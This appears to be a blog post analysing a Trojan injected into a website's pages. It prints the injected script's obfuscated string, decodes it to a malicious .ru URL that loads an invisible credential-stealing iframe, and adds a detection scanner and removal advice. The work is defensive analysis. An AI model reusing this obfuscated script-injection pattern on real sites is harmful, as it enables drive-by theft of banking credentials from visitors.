It didn't take long to figure out where the Trojan is hiding and how it's attacking.
As soon as I opened the about and contact pages, Nod32 alerted that the pages I was viewing contained malicious JavaScript. When I viewed the source code I saw this suspicious script:
The interesting part is the strange code spanning lines 7 to 13. This code is the second parameter of the setAttribute function, so it looks like this: setAttribute('src', strange code).
This function is used to set the value of an attribute on an object. It is typically used along with objects returned by document.getElementById to assign a new value to the object's attribute.
Notice the string.replace function at line 13? It replaces the characters !, @, #, $, %, ^, &, (, ) with nothing. I wrote a simple Python script that does the same replacement:

import sys

# The obfuscated value copied from the injected script
strange_code = 'h#&#t&#!t$!@p):)$/!&^/!x#^&t@#&u@b($!)e#(-)c^@$&o#(#m^!$^.&$)b$($l$o!(#&)g(&g)(^$e!$r#@(.@^&(c(o^#m@)!#.)#p!(@o&r@)n(^$o$!^r&!a$)&m$@a$^$@-!c((^o#($m!.&#b$^$l)^u!$!e((#@)j@@a@)@c#k)!^m^(u$$!(s@$@i^@c@&.!@)r@u(!:(^8&@!)!0@)8)@#0&(!/$&)h^d$@$f$(^c^)b@$&a)^n^(k^#.&@^&c#(!#$o^m!)#/!h^@#d(&f)&c^()b#(a^$!n&^(#$k^#.!$c)o))m)&&/($&!g$$o!)o^()g))@(l$^@)e#^&.&&c^(o()m@!)(/(&f)#a!!@n!$@p))o)((p!^#.@c^!@o&@m)@&/@!!i&n^#!.&#!c)))!o(m#/)((!'

# Strip every junk character, exactly as the script's replace calls do
strange_code = strange_code.replace('!', '')
strange_code = strange_code.replace('@', '')
strange_code = strange_code.replace('#', '')
strange_code = strange_code.replace('$', '')
strange_code = strange_code.replace('%', '')
strange_code = strange_code.replace('^', '')
strange_code = strange_code.replace('&', '')
strange_code = strange_code.replace('(', '')
strange_code = strange_code.replace(')', '')
print(strange_code)

The result:
http://xtube-com.blogger.com.pornorama-com.bluejackmusic.ru:8080/hdfcbank.com/hdfcbank.com/google.com/fanpop.com/in.com/
Basically this script adds a reference to a JavaScript file located at the address above. I followed that address and found a script that opens an invisible iframe. Through this invisible iframe the attackers can steal information such as online banking credentials.
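As an added example (not the author's script), here is a small Python scanner that generalizes the replace() trick above: it pulls quoted strings containing many of the junk characters out of a page's source, strips them the same way and reports any that decode to a URL, so the injected reference can be located across a site's files. The sample page and the example.invalid address are constructed for this example.

```python
import re
import sys
from pathlib import Path

# Characters the injected script strips with its chain of replace() calls
JUNK = "!@#$%^&()"

def deobfuscate(s, junk=JUNK):
    """Remove every junk character, as the injected script's replace() chain does."""
    return s.translate(str.maketrans("", "", junk))

# Constructed sample page, loosely modelled on the injected script described above;
# the obfuscated URL decodes to a placeholder on the reserved .invalid TLD.
SAMPLE_PAGE = """<html><body>
<script>
var s = document.createElement('script');
s.setAttribute('src', 'h#t@t$p:^/&/(e)x!a@m#p$l^e&.(i)n!v@a#l$i^d&/(e)v!i@l#.$j^s&'.replace(/[!@#$%^&()]/g, ''));
document.body.appendChild(s);
</script>
</body></html>"""

# Single-quoted JS string literals; a literal with at least min_junk junk characters
# is a cheap signal for this obfuscation style (threshold is an assumption).
CANDIDATE_RE = re.compile(r"'((?:[^'\\]|\\.)*)'")

def find_obfuscated_urls(source, min_junk=8):
    """Return (raw, decoded) pairs for quoted strings that decode to a URL."""
    hits = []
    for m in CANDIDATE_RE.finditer(source):
        raw = m.group(1)
        if sum(c in JUNK for c in raw) < min_junk:
            continue
        decoded = deobfuscate(raw)
        if decoded.startswith(("http://", "https://", "//")):
            hits.append((raw, decoded))
    return hits

def scan_files(paths):
    """Scan each file; return {path: [decoded urls]} for files that contain hits."""
    report = {}
    for p in paths:
        hits = find_obfuscated_urls(Path(p).read_text(errors="replace"))
        if hits:
            report[str(p)] = [decoded for _, decoded in hits]
    return report

if __name__ == "__main__":
    # Usage: python deobf_scan.py page1.html page2.html ...
    for path, urls in scan_files(sys.argv[1:]).items():
        print(path, "->", ", ".join(urls))
```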
How to remove this Trojan?
Simply remove it from every page you find it in.
How to avoid it from infecting your files again?
It probably infected the files through FTP, so:
1. Change your FTP credentials.
2. Install a good anti-spyware application.
3. Don't use public machines to access your FTP.
4. Check the files that users are uploading to your website.